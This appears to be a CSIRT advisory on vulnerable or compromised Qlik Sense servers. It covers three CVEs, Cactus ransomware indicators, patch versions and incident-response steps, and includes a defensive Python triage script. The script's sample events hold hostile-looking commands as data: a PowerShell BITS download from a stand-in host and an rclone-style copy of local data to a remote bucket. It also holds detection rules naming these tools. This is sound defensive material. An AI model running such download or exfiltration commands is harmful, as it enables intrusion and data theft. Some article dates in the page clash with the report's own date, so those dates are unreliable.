Qlik Sense Special Report

Description

On the 28th April 2024, the Shadowserver Foundation published the Vulnerable/Compromised Qlik Sense Special Report. The Special Report identified hosts within the jurisdiction reported to be running Qlik Sense systems. The Qlik Software Company has publicly disclosed three (3) Common Vulnerabilities and Exposures (CVEs) that affect its Qlik Sense Enterprise for Windows product. The company, originally founded in Sweden in 1993, is now based in Pennsylvania, USA.

The Cactus Ransomware Group is being researched by Fox-IT, part of the information assurance firm NCC Group, based in Manchester, UK, in collaboration with a number of Dutch cyber security firms. They have reported that the group has been actively targeting and exploiting Qlik Sense systems for initial access since November 2023.

Fox-IT developed a fingerprinting technique to identify Qlik Sense systems that are vulnerable to the method and techniques employed by the Cactus Ransomware Group to gain initial access to a Qlik Sense system and, more critically, to identify which systems are already compromised.

In the Shadowserver Foundation Vulnerable/Compromised Qlik Sense Special Report published on the 28th April 2024, six (6) hosts identified as running Qlik Sense systems are reported to be compromised.

Constituents are advised to take appropriate action in the event of having a host identified as running Qlik Sense in the Shadowserver Foundation Vulnerable/Compromised Qlik Sense Special Report dated the 28th April 2024.

The Shadowserver Foundation Vulnerable/Compromised Qlik Sense Special Report has a default severity level of 'Critical'.

Qlik Sense

Qlik Sense is data analysis and visualisation software. It operates with an associative QIX engine, which enables the user to link and associate data from varied sources and to carry out dynamic searching and selections. Qlik Sense serves as a data analytics platform for a wide range of users, from non-technical to technical. Qlik Sense makes heavy use of data visualisation, with rich graphics that make it possible to show and analyse data graphically.

HTTP listens on port 80/TCP.

HTTPS listens on port 443/TCP.

Problem

In August 2023, two (2) security vulnerabilities in Qlik Sense Enterprise for Windows were identified by Adam Crosser and Thomas Hendrickson of the cybersecurity company Praetorian, based in Austin, Texas, USA. These vulnerabilities involved HTTP tunnelling and path traversal. It was also discovered that if the two vulnerabilities are combined and successfully exploited, they could lead to a compromise of the server running the Qlik Sense software, including unauthenticated remote code execution (RCE).

The Qlik Software Company publicly disclosed three (3) Common Vulnerabilities & Exposures (CVEs) that affect their Qlik Sense Enterprise for Windows on the respective dates shown.

No. CVEs Description Disclosed
1. CVE-2023-41265. HTTP Tunneling Vulnerability in Qlik Sense Enterprise for Windows. 29th Aug 2023.
2. CVE-2023-41266. Path Traversal Vulnerability in Qlik Sense Enterprise for Windows. 29th Aug 2023.
3. CVE-2023-48365. Unauthenticated remote code execution (RCE) vulnerability in Qlik Sense Enterprise for Windows as a consequence of an incomplete fix for CVE-2023-41265. 20th Sep 2023.

On the 25th April 2024, Willem Zeeman and Yun Zheng Hu of Fox-IT, part of the information assurance firm NCC Group, based in Manchester, UK, in collaboration with a number of Dutch cyber security firms that had been researching the Cactus Ransomware Group, reported the group's modus operandi of exploiting Qlik Sense systems for initial access, which the group has been actively targeting since November 2023.

Fox-IT, together with their colleagues from the various Dutch cyber security firms, discovered that the Cactus Ransomware Group uses a particular method and technique for initial access to Qlik Sense systems. Based on these discoveries, Fox-IT developed a fingerprinting technique to identify Qlik Sense systems that are vulnerable to this method and technique of initial access and, even more critically, which systems are already compromised.

Arctic Wolf Networks, the computer and network security company based in Eden Prairie, Minnesota, USA, on the 28th Nov 2024 published a list of Indicators of Compromise (IoCs) they had observed in their incident response (IR) investigation into the new Cactus Ransomware Group campaign, which is reported to exploit publicly exposed installations of Qlik Sense.

Cactus Ransomware Group - Indicators of Compromise (IoCs).


No. Reported by Description Article - IOCs
1. Fox-IT. The Cactus Ransomware Group are reported to redirect the output of executed commands to a TrueType font file named qle.ttf, likely an abbreviation of "qlik exploit". In addition to the qle.ttf file, Fox-IT have also observed instances where qle.woff was used. These font files are not part of a default Qlik Sense server installation. Fox-IT discovered that files with a font file extension such as .ttf and .woff can be accessed without any authentication, regardless of whether the server is patched. This may explain why the Cactus Ransomware Group opted to store command output in font files within the fonts directory, which in turn also serves as a useful Indicator of Compromise (IoC). Fox-IT - Identifying Cactus ransomware victims
2. Arctic Wolf Labs. The Cactus Ransomware Group are reported to leverage PowerShell and the Background Intelligent Transfer Service (BITS) to download additional tools to establish persistence and ensure remote control, including renamed ManageEngine UEMS executables with a ZIP extension masquerading as Qlik files. These files were renamed again after being downloaded and invoked for silent installation. AnyDesk is downloaded directly from anydesk.com. A Plink (PuTTY Link) binary is downloaded and renamed to putty.exe. Current evidence revealed that RDP is used for lateral movement, the WizTree disk space analyser is downloaded, and rclone (renamed as svchost.exe) is leveraged for data exfiltration. Arctic Wolf Labs - Qlik Sense Exploited in Cactus Ransomware Campaign
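The IoCs in the table above, and the Injected-code;webshell tag that Shadowserver derives from the Fox-IT font-file finding, expressed as defender-side triage logic. This is an added example, not code from Fox-IT, Arctic Wolf or Shadowserver: the event layout and the "/fonts/" request path are assumptions, and the sample events are constructed.

```python
"""Triage constructed sample telemetry against the Cactus/Qlik Sense IoCs above.

Added example (not Fox-IT, Arctic Wolf or Shadowserver code). Event shapes and
the "/fonts/" request path are assumptions; the indicators are from the report.
"""
from pathlib import PureWindowsPath

# Constructed sample events: ("web", request path) from the Qlik web tier,
# ("proc", image path, command line) from Windows process-creation logging.
SAMPLE_EVENTS = [
    ("web", "/hub/"),
    ("web", "/fonts/qle.ttf"),
    ("web", "/fonts/qle.woff"),
    ("web", "/fonts/opensans.woff"),
    ("proc", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    ("proc", r"C:\ProgramData\svchost.exe", r"svchost.exe copy C:\data remote:bucket"),
    ("proc", r"C:\Users\Public\putty.exe", "putty.exe"),
    ("proc", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -Command Start-BitsTransfer -Source https://example.invalid/x.zip "
     r"-Destination C:\ProgramData\qlik.zip"),
]

SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
QLE_FONTS = {"qle.ttf", "qle.woff"}   # Fox-IT IoC: not part of a default install
FONT_EXTS = (".ttf", ".woff")         # served without authentication per Fox-IT


def triage_web(path):
    """Flag requests for font files; qle.* is the documented Cactus marker."""
    name = path.rsplit("/", 1)[-1].lower()
    if name in QLE_FONTS:
        return ("high", "fox-it-qle-font-file", path)
    if name.endswith(FONT_EXTS):
        return ("review", "font-file-request", path)  # compare with default install
    return None


def triage_proc(image, cmdline):
    """Flag the renamed tools and download methods Arctic Wolf observed."""
    p = PureWindowsPath(image)
    name, parent, cl = p.name.lower(), str(p.parent).lower(), cmdline.lower()
    if name == "svchost.exe" and not parent.startswith(SYSTEM_DIRS):
        return ("high", "svchost-outside-system-dir", image)  # rclone masquerade
    if name == "putty.exe":
        return ("review", "putty-binary", image)              # Plink renamed putty.exe
    if name in ("powershell.exe", "pwsh.exe") and "start-bitstransfer" in cl:
        return ("review", "powershell-bits-download", cmdline)
    if name == "bitsadmin.exe" or "anydesk.com" in cl:
        return ("review", "tool-download", cmdline)
    return None


def triage(events):
    """Return every hit as (severity, rule, detail), in input order."""
    hits = (triage_web(e[1]) if e[0] == "web" else triage_proc(e[1], e[2]) for e in events)
    return [h for h in hits if h]


if __name__ == "__main__":
    for severity, rule, detail in triage(SAMPLE_EVENTS):
        print(f"{severity:6} {rule:28} {detail}")
```

A "review" hit is a prompt to compare against the default installation and known administrative activity, not a confirmed compromise; the qle.ttf/qle.woff and out-of-place svchost.exe rules are the ones the reports treat as direct indicators.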

Common Vulnerabilities & Exposures (CVEs)


Systems used for reporting and assessing the severity of security vulnerabilities.

No. System Description
1. Common Vulnerabilities and Exposures (CVE). The CVE system is used to identify, define, catalogue and publicly disclose known information-security vulnerabilities and exposures.
2. The Common Vulnerability Scoring System (CVSS). CVSS is a free and open industry standard for assessing the severity of computer system security vulnerabilities.  It provides a numerical (0-10) representation of the severity of an information security vulnerability.

CVSSv3.0 Metrics.

No. Base Score Range Severity
1. 0.0 None
2. 0.1 - 3.9 Low
3. 4.0 - 6.9 Medium
4. 7.0 - 8.9 High
5. 9.0 - 10.0 Critical

List of CVEs - Qlik Sense Enterprise for Windows

Publicly disclosed on the 29th Aug 2023 & 20th Sep 2023.

No. CVE Report Description CVSSv3 Advisory
1. CVE-2023-41265. An HTTP tunnelling vulnerability in Qlik Sense Enterprise for Windows due to improper validation of HTTP headers. If successfully exploited, an attacker could elevate their privileges and execute HTTP requests on the backend server hosting the software. 9.6 Qlik Community Critical Security Fix
2. CVE-2023-41266. A path traversal vulnerability in Qlik Sense Enterprise for Windows stemming from improper user input validation, which could allow a remote, unauthenticated attacker to create an anonymous session by sending maliciously crafted HTTP requests. This anonymous session could allow them to send further requests to unauthorized endpoints. 8.2 Qlik Community Security Fix
3. CVE-2023-48365. Unauthenticated remote code execution (RCE) vulnerability in Qlik Sense Enterprise for Windows as a consequence of an incomplete fix for CVE-2023-41265. Due to improper validation of HTTP headers, a remote attacker is able to elevate their privilege by tunneling HTTP requests, allowing them to execute HTTP requests on the backend server that hosts the repository application. 9.6 Qlik Community Critical Security Fix

Note: Constituents, on clicking the CVE link in the table above, will be directed to the www.mitre.org webpage, which contains relevant information on the particular CVE number. Constituents then have the option to click on the www.cve.org link, which will direct them to the www.cve.org webpage, where additional information on the CVE in question can be accessed by entering the CVE number in the Find field.

Solution

Shadowserver Foundation - Qlik Sense Special Report - Tag Index.

Note: The Shadowserver Foundation has included in the 'Tag' column of their report, a list of terms, which indicate the type of vulnerability associated with the specific host identified in the report.

No. System Description
1. CVE-2023-41265. An HTTP tunnelling vulnerability in Qlik Sense Enterprise for Windows due to improper validation of HTTP headers. If successfully exploited, an attacker could elevate their privileges and execute HTTP requests on the backend server hosting the software.
2. CVE-2023-41266. A path traversal vulnerability in Qlik Sense Enterprise for Windows stemming from improper user input validation which could allow a remote, unauthenticated attacker to create an anonymous session by sending maliciously crafted HTTP requests.   This anonymous session could allow them to send further requests to unauthorized endpoints.
3. CVE-2023-48365. Unauthenticated remote code execution vulnerability in Qlik Sense Enterprise for Windows as a consequence of an incomplete fix for CVE-2023-41265.  Due to improper validation of HTTP headers, a remote attacker is able to elevate their privilege by tunneling HTTP requests, allowing them to execute HTTP requests on the backend server that hosts the repository application.
4. Injected-code;webshell. Fox-IT, in their research into the Cactus Ransomware Group and its modus operandi of exploiting Qlik Sense systems, discovered that files with a font file extension such as .ttf and .woff can be accessed without any authentication, regardless of whether the server is patched. This, they say, explains why the Cactus Ransomware Group opted to store command output in font files within the fonts directory, which in turn also serves as a useful Indicator of Compromise (IoC). A potential instance of a compromised Qlik Sense system is determined remotely by checking for the presence of files with a .ttf or .woff file extension.

Recommendations.

No. Tag Affected Software Recommendations
1. CVE-2023-41265. All versions of Qlik Sense Enterprise for Windows prior to and including these releases are impacted:  May 2023 Patch 3, February 2023 Patch 7, November 2022 Patch 10, August 2022 Patch 12. Qlik Sense Enterprise for Windows should be upgraded to a version containing fixes for these issues.   Fixes are available for the following versions:  August 2023 Initial Release, May 2023 Patch 4, February 2023 Patch 8,  November 2022 Patch 11, August 2022 Patch 13.
2. CVE-2023-41266. All versions of Qlik Sense Enterprise for Windows prior to and including these releases are impacted:   May 2023 Patch 3, February 2023 Patch 7, November 2022 Patch 10, August 2022 Patch 12. Qlik Sense Enterprise for Windows should be upgraded to a version containing fixes for these issues.  Fixes are available for the following versions:  August 2023 Initial Release, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, August 2022 Patch 13.
3. CVE-2023-48365. All versions of Qlik Sense Enterprise for Windows prior to and including these releases are impacted:  August 2023 Patch 1, May 2023 Patch 5, February 2023 Patch 9, November 2022 Patch 11, August 2022 Patch 13, May 2022 Patch 15, February 2022 Patch 14, November 2021 Patch 16. Qlik Sense Enterprise for Windows should be upgraded to a version containing fixes for these issues.   Fixes are available for the following versions:  November 2023 Initial Release, August 2023 Patch 2, May 2023 Patch 6,  February 2023 Patch 10, November 2022 Patch 12, August 2022 Patch 14, May 2022 Patch 16, February 2022 Patch 15,  November 2021 Patch 17.
4. Injected-code;webshell. Constituents are advised to read the article published by Fox-IT on the 25th April 2024 and the article published by Arctic Wolf Labs on the 28th Nov 2024; both articles contain details of the modus operandi of the Cactus Ransomware Group in exploiting Qlik Sense systems, together with a list of Indicators of Compromise (IoCs). (See Cactus Ransomware Group - Indicators of Compromise (IoCs) above for links.) Constituents are advised to disconnect their network from the internet. This action will cut off the Cactus Ransomware Group's access to the compromised computer, preventing them from exfiltrating data. Disconnect backup devices from the compromised computer and protect all data backups. Switching the computer off may destroy valuable forensic evidence, which may be required to establish how the computer and network security was breached. Change passwords for all login accounts on the network and cloud services using a computer on a separate network. Investigate the incident to establish the facts and consult with cyber security experts if necessary. In the event of a crime, the incident must be reported to An Garda Síochána.

Qlik Sense Architecture Components.

No. Component Description
1. Qlik Sense Clients. The Qlik Sense Hub is the platform where the user performs operations on the data and creates applications with required visualizations.  It is the place where users connect with the software and design dashboards for their business analysis.  It provides easy drag-and-drop functionality, associative data model,  range of visualization etc.  The viewing of final dashboards is flexible as the screen and its contents are automatically adjusted according to the screen size of the device such as a laptop, desktop, tablet, mobile.  The hub is developed by utilising HTML5,  CSS3 and JavaScript.
2. Qlik Sense Nodes. The nodes are physical or logical computers that deploy separate services or a combination of services. This assigns certain roles to a node. There are primarily three types of node role, based on the services it provides: a user or consumer node that delivers apps to the end users; a scheduler node that manages all the service and app reloads; and a proxy node that handles authentication, load balancing and session handling. Typically there are two types of node, central nodes and rim nodes. Each node is capable of taking up multiple roles, deploying a combination of Qlik Sense services and operating independently. A node can be used for production, development or both at the same time.
3. Qlik Sense Sites. A Qlik Sense site consists of a node system. It can have a single node or multiple nodes, also known as servers. Every node system has a single repository, database and license. A single-node deployment consists only of the central node, which has all the required services deployed on it. It works in sync with the data repository and file sharing systems. A multi-node site, by contrast, is a distributed system with services spread across many nodes. The central node manages all the peripheral nodes. All the nodes share the same repository, database and license key. A multi-node system also provides better scalability, resilience, reliability, governance, capacity and flexibility to suit customer requirements.
4. Qlik Sense Storage. There are two (2) storage components that work with the other architectural components. One is the repository database and the other is a file share system. The repository database is a PostgreSQL database that keeps metadata. This data is called entity data and is not very large in size. The file share system stores the Qlik Sense application data, such as dimensions, measures, objects and visualisations, as binary files, and such data files are made available to all the nodes or servers in a site. Qlik Sense apps are thus stored as QVF files.

Qlik Sense Architecture Services.

No. Service Description
1. Qlik Sense Proxy (QSP). The QSP serves as the entry point for both users and administrators via the hub and the management console. The QSP serves many purposes: session management, license provisioning, load balancing, and connecting with user identity providers such as SAML and Active Directory.
2. Qlik Sense Engine (QIX). This is the main interactive, associative engine that provides all the major functionality of Qlik Sense. The functions of QIX are in-memory data indexing and calculation (the engine is RAM-based), smart searching, interactive and self-service interactions, and communicating with the scheduler, repository and applications.
3. Qlik Sense Scheduler (QSS). The QSS schedules and coordinates data loads and application reloads.
4. Qlik Sense Repository (QSR). The repository is where all the data and information regarding the configuration and management of the other Qlik Sense services is stored. The main areas of work of the QSR are managing user definitions and security.
5. Qlik Sense Applications (QVF). This is the final layer, where the user uses the data to create visualisations and sheets in Qlik Sense. A Qlik Sense application may have one or more sheets, and a complete set of those makes an application, stored as a Qlik Sense .QVF file. Such files contain data in compressed form, a data model pertaining to the data loaded into Qlik Sense's memory, and a final presentation layer.

Additional Information

Shadowserver Foundation - Vulnerable or Compromised Qlik Sense Special Report.
Fox-IT - Sifting through the Spines: Identifying (potential) Cactus Ransomware Victims.
Arctic Wolf Labs - Qlik Sense Exploited in Cactus Ransomware Campaign.
Arctic Wolf Labs - CVE-2023-41265, CVE-2023-41266 & CVE-2023-48365: Multiple Vulnerabilities in Qlik Sense Enterprise Actively Exploited.
ZeroQlik: Achieving Unauthenticated Remote Code Execution via HTTP Request Tunneling and Path Traversal.
Cybersecuritydive - Schneider Electric hit by ransomware attack against its sustainability business division.
SOCRadar - Dark Web Profile: Cactus Ransomware.
Bitdefender - CACTUS: Analyzing a Coordinated Ransomware Attack on Corporate Networks.
Qlik Help.
Qlik Sense Architecture – 4 Major Components of Architecture.
101. What is QIX and Why Should You Care?.
Qlik Sense Tutorial For Beginners – Features and Architecture.
PrickSense: How Cactus Exploits Qlik Sense.
RFC2616 - Hypertext Transfer Protocol -- HTTP/1.1.
Cyberveilig Nederland - Press release: Melissa partnership finds several Dutch victims of ransomware group Cactus.
Critical Security fixes for Qlik Sense Enterprise for Windows (CVE-2023-41266, CVE-2023-41265).
Critical Security fixes for Qlik Sense Enterprise for Windows (CVE-2023-48365).